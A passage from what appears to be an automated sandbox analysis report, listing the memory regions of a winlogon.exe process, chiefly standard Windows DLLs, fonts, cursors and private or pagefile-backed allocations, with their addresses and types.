0x8e7fff entry_point = 0x8a0000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 36644 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36645 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36646 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36647 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36648 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36649 start_va = 0x1b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 36650 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36651 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36652 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 36653 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007f6f0000" filename = "" Region: id = 36654 start_va = 0x20000 end_va = 0x86fff entry_point = 0x20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36655 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36656 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36657 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36658 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36659 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36660 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 36661 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36662 start_va = 0x90000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 
36663 start_va = 0x90000 end_va = 0xacfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36664 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 36665 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 36666 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 36667 start_va = 0x90000 end_va = 0xacfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36668 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36669 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 36670 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 36671 start_va = 0x90000 end_va = 0x96fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 36672 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 36673 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 36674 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 
region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 36675 start_va = 0x8f0000 end_va = 0xce2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 36676 start_va = 0x4d0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 36677 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 36678 start_va = 0x6f0000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 36679 start_va = 0xcf0000 end_va = 0xe6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 36680 start_va = 0x4d0000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 36681 start_va = 0x5b0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 36682 start_va = 0x6f0000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 36683 start_va = 0x830000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 36684 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 36685 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 36686 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" 
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 36687 start_va = 0x660000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 36688 start_va = 0x6b0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 36689 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36690 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 36691 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 36692 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36730 start_va = 0x75bf0000 end_va = 0x75bf3fff entry_point = 0x75bf0000 region_type = mapped_file name = "kbdus.dll" filename = "\\Windows\\System32\\KBDUS.DLL" (normalized: "c:\\windows\\system32\\kbdus.dll") Region: id = 36731 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 36732 start_va = 0xe70000 end_va = 0x1df2fff entry_point = 0xe70000 region_type = mapped_file name = "batang.ttc" filename = "\\Windows\\Fonts\\batang.ttc" (normalized: "c:\\windows\\fonts\\batang.ttc") Region: id = 36733 start_va = 0xe70000 end_va = 0x1b55fff entry_point = 0xe70000 region_type = mapped_file name = "gulim.ttc" filename = "\\Windows\\Fonts\\gulim.ttc" (normalized: "c:\\windows\\fonts\\gulim.ttc") Region: id = 36734 start_va = 0xe70000 end_va = 0x1292fff entry_point = 0xe70000 region_type = mapped_file name = 
"malgun.ttf" filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf") Region: id = 36735 start_va = 0xe70000 end_va = 0x12befff entry_point = 0xe70000 region_type = mapped_file name = "malgunbd.ttf" filename = "\\Windows\\Fonts\\malgunbd.ttf" (normalized: "c:\\windows\\fonts\\malgunbd.ttf") Region: id = 36736 start_va = 0xe70000 end_va = 0x1787fff entry_point = 0xe70000 region_type = mapped_file name = "meiryo.ttc" filename = "\\Windows\\Fonts\\meiryo.ttc" (normalized: "c:\\windows\\fonts\\meiryo.ttc") Region: id = 36737 start_va = 0xe70000 end_va = 0x17bcfff entry_point = 0xe70000 region_type = mapped_file name = "meiryob.ttc" filename = "\\Windows\\Fonts\\meiryob.ttc" (normalized: "c:\\windows\\fonts\\meiryob.ttc") Region: id = 36738 start_va = 0xe70000 end_va = 0x2318fff entry_point = 0xe70000 region_type = mapped_file name = "msjh.ttf" filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf") Region: id = 36739 start_va = 0xe70000 end_va = 0x1c46fff entry_point = 0xe70000 region_type = mapped_file name = "msjhbd.ttf" filename = "\\Windows\\Fonts\\msjhbd.ttf" (normalized: "c:\\windows\\fonts\\msjhbd.ttf") Region: id = 36740 start_va = 0xe70000 end_va = 0x2332fff entry_point = 0xe70000 region_type = mapped_file name = "msyh.ttf" filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf") Region: id = 36741 start_va = 0xe70000 end_va = 0x1c5dfff entry_point = 0xe70000 region_type = mapped_file name = "msyhbd.ttf" filename = "\\Windows\\Fonts\\msyhbd.ttf" (normalized: "c:\\windows\\fonts\\msyhbd.ttf") Region: id = 36742 start_va = 0xe70000 end_va = 0x2d29fff entry_point = 0xe70000 region_type = mapped_file name = "mingliu.ttc" filename = "\\Windows\\Fonts\\mingliu.ttc" (normalized: "c:\\windows\\fonts\\mingliu.ttc") Region: id = 36743 start_va = 0xe70000 end_va = 0x2eadfff entry_point = 0xe70000 region_type = mapped_file name = "mingliub.ttc" filename = 
"\\Windows\\Fonts\\mingliub.ttc" (normalized: "c:\\windows\\fonts\\mingliub.ttc") Region: id = 36744 start_va = 0xe70000 end_va = 0x1730fff entry_point = 0xe70000 region_type = mapped_file name = "msgothic.ttc" filename = "\\Windows\\Fonts\\msgothic.ttc" (normalized: "c:\\windows\\fonts\\msgothic.ttc") Region: id = 36745 start_va = 0xe70000 end_va = 0x1807fff entry_point = 0xe70000 region_type = mapped_file name = "msmincho.ttc" filename = "\\Windows\\Fonts\\msmincho.ttc" (normalized: "c:\\windows\\fonts\\msmincho.ttc") Region: id = 36746 start_va = 0x6f0000 end_va = 0x76efff entry_point = 0x6f0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 36747 start_va = 0x7f0000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 36748 start_va = 0x6f0000 end_va = 0x769fff entry_point = 0x6f0000 region_type = mapped_file name = "segoeuib.ttf" filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf") Region: id = 36749 start_va = 0xe70000 end_va = 0x1d0dfff entry_point = 0xe70000 region_type = mapped_file name = "simsun.ttc" filename = "\\Windows\\Fonts\\simsun.ttc" (normalized: "c:\\windows\\fonts\\simsun.ttc") Region: id = 36750 start_va = 0xe70000 end_va = 0x1d21fff entry_point = 0xe70000 region_type = mapped_file name = "simsunb.ttf" filename = "\\Windows\\Fonts\\simsunb.ttf" (normalized: "c:\\windows\\fonts\\simsunb.ttf") Region: id = 36751 start_va = 0x6f0000 end_va = 0x79afff entry_point = 0x6f0000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 36752 start_va = 0x6f0000 end_va = 0x78ffff entry_point = 0x6f0000 region_type = mapped_file name = "micross.ttf" filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf") Region: id = 36831 
start_va = 0xe0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 36832 start_va = 0x120000 end_va = 0x13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 36833 start_va = 0x75b90000 end_va = 0x75b93fff entry_point = 0x75b90000 region_type = mapped_file name = "kbdus.dll" filename = "\\Windows\\System32\\KBDUS.DLL" (normalized: "c:\\windows\\system32\\kbdus.dll") Region: id = 36834 start_va = 0x90000 end_va = 0x96fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 36835 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 36836 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_arrow.cur" filename = "\\Windows\\Cursors\\aero_arrow.cur" (normalized: "c:\\windows\\cursors\\aero_arrow.cur") Region: id = 36837 start_va = 0x8f0000 end_va = 0xce2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 36838 start_va = 0x280000 end_va = 0x2bdfff entry_point = 0x280000 region_type = mapped_file name = "aero_busy.ani" filename = "\\Windows\\Cursors\\aero_busy.ani" (normalized: "c:\\windows\\cursors\\aero_busy.ani") Region: id = 36839 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_up.cur" filename = "\\Windows\\Cursors\\aero_up.cur" (normalized: "c:\\windows\\cursors\\aero_up.cur") Region: id = 36840 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_nwse.cur" filename = "\\Windows\\Cursors\\aero_nwse.cur" (normalized: "c:\\windows\\cursors\\aero_nwse.cur") Region: id = 36841 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_nesw.cur" 
filename = "\\Windows\\Cursors\\aero_nesw.cur" (normalized: "c:\\windows\\cursors\\aero_nesw.cur") Region: id = 36842 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_ew.cur" filename = "\\Windows\\Cursors\\aero_ew.cur" (normalized: "c:\\windows\\cursors\\aero_ew.cur") Region: id = 36843 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_ns.cur" filename = "\\Windows\\Cursors\\aero_ns.cur" (normalized: "c:\\windows\\cursors\\aero_ns.cur") Region: id = 36844 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_move.cur" filename = "\\Windows\\Cursors\\aero_move.cur" (normalized: "c:\\windows\\cursors\\aero_move.cur") Region: id = 36845 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_unavail.cur" filename = "\\Windows\\Cursors\\aero_unavail.cur" (normalized: "c:\\windows\\cursors\\aero_unavail.cur") Region: id = 36846 start_va = 0x280000 end_va = 0x2bdfff entry_point = 0x280000 region_type = mapped_file name = "aero_working.ani" filename = "\\Windows\\Cursors\\aero_working.ani" (normalized: "c:\\windows\\cursors\\aero_working.ani") Region: id = 36847 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_helpsel.cur" filename = "\\Windows\\Cursors\\aero_helpsel.cur" (normalized: "c:\\windows\\cursors\\aero_helpsel.cur") Region: id = 36848 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_pen.cur" filename = "\\Windows\\Cursors\\aero_pen.cur" (normalized: "c:\\windows\\cursors\\aero_pen.cur") Region: id = 36849 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_link.cur" filename = "\\Windows\\Cursors\\aero_link.cur" (normalized: "c:\\windows\\cursors\\aero_link.cur") Region: id = 37455 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 
region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 37456 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37767 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 37768 start_va = 0xd60000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 37769 start_va = 0xe30000 end_va = 0xe6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 37770 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 38178 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 38183 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 38184 start_va = 0x73f30000 end_va = 0x73f37fff entry_point = 0x73f30000 region_type = mapped_file name = "uxinit.dll" filename = "\\Windows\\System32\\UXInit.dll" (normalized: "c:\\windows\\system32\\uxinit.dll") Region: id = 38198 start_va = 0x74a80000 end_va = 0x74abffff entry_point = 0x74a80000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 38199 start_va = 0xe70000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 38200 start_va = 0x1040000 end_va = 0x130efff entry_point = 0x1040000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 38201 
start_va = 0xe70000 end_va = 0xf8dfff entry_point = 0xe70000 region_type = mapped_file name = "aero.msstyles" filename = "\\Windows\\Resources\\Themes\\Aero\\aero.msstyles" (normalized: "c:\\windows\\resources\\themes\\aero\\aero.msstyles") Region: id = 38202 start_va = 0x1000000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 38203 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38204 start_va = 0x280000 end_va = 0x2bbfff entry_point = 0x280000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38205 start_va = 0x280000 end_va = 0x2bbfff entry_point = 0x280000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38206 start_va = 0x280000 end_va = 0x2bbfff entry_point = 0x280000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38207 start_va = 0x280000 end_va = 0x2bbfff entry_point = 0x280000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38208 start_va = 0x280000 end_va = 0x2bbfff entry_point = 0x280000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38209 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38210 start_va = 0x75ba0000 end_va 
= 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 38211 start_va = 0x1310000 end_va = 0x142dfff entry_point = 0x1310000 region_type = mapped_file name = "aero.msstyles" filename = "\\Windows\\Resources\\Themes\\Aero\\aero.msstyles" (normalized: "c:\\windows\\resources\\themes\\aero\\aero.msstyles") Region: id = 38212 start_va = 0x1310000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 38213 start_va = 0x74620000 end_va = 0x7471afff entry_point = 0x74620000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 38214 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 38215 start_va = 0x1d10000 end_va = 0x1e12fff entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 38216 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 38217 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 38218 start_va = 0x1d10000 end_va = 0x270ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d10000" filename = "" Region: id = 38219 start_va = 0x2710000 end_va = 0x280ffff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 38227 start_va = 0xe70000 end_va = 0xf4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 38230 
start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 38231 start_va = 0x1310000 end_va = 0x1f0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001310000" filename = "" Region: id = 38392 start_va = 0xdd0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 38393 start_va = 0x744e0000 end_va = 0x744eefff entry_point = 0x744e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 38394 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 38402 start_va = 0x75810000 end_va = 0x7583afff entry_point = 0x75810000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 38403 start_va = 0x744f0000 end_va = 0x744f8fff entry_point = 0x744f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 38409 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38410 start_va = 0x730000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 38411 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 38416 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 38420 start_va = 0x4d0000 end_va 
= 0x51ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 38421 start_va = 0x530000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 38422 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 38423 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 38424 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 38430 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38518 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38519 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38523 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38527 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38530 start_va = 0x72a90000 end_va = 0x72a93fff entry_point = 0x72a90000 region_type = mapped_file name = "kbdus.dll" filename = "\\Windows\\System32\\KBDUS.DLL" (normalized: "c:\\windows\\system32\\kbdus.dll") Region: id = 38531 start_va = 0x90000 end_va = 0x96fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 38532 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 38533 start_va = 0x280000 
end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_arrow.cur" filename = "\\Windows\\Cursors\\aero_arrow.cur" (normalized: "c:\\windows\\cursors\\aero_arrow.cur") Region: id = 38534 start_va = 0x8f0000 end_va = 0xce2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 38535 start_va = 0x5f0000 end_va = 0x62dfff entry_point = 0x5f0000 region_type = mapped_file name = "aero_busy.ani" filename = "\\Windows\\Cursors\\aero_busy.ani" (normalized: "c:\\windows\\cursors\\aero_busy.ani") Region: id = 38536 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_up.cur" filename = "\\Windows\\Cursors\\aero_up.cur" (normalized: "c:\\windows\\cursors\\aero_up.cur") Region: id = 38537 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_nwse.cur" filename = "\\Windows\\Cursors\\aero_nwse.cur" (normalized: "c:\\windows\\cursors\\aero_nwse.cur") Region: id = 38538 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_nesw.cur" filename = "\\Windows\\Cursors\\aero_nesw.cur" (normalized: "c:\\windows\\cursors\\aero_nesw.cur") Region: id = 38539 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_ew.cur" filename = "\\Windows\\Cursors\\aero_ew.cur" (normalized: "c:\\windows\\cursors\\aero_ew.cur") Region: id = 38540 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_ns.cur" filename = "\\Windows\\Cursors\\aero_ns.cur" (normalized: "c:\\windows\\cursors\\aero_ns.cur") Region: id = 38541 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_move.cur" filename = "\\Windows\\Cursors\\aero_move.cur" (normalized: "c:\\windows\\cursors\\aero_move.cur") Region: id = 38542 start_va = 0x280000 end_va = 0x283fff entry_point = 
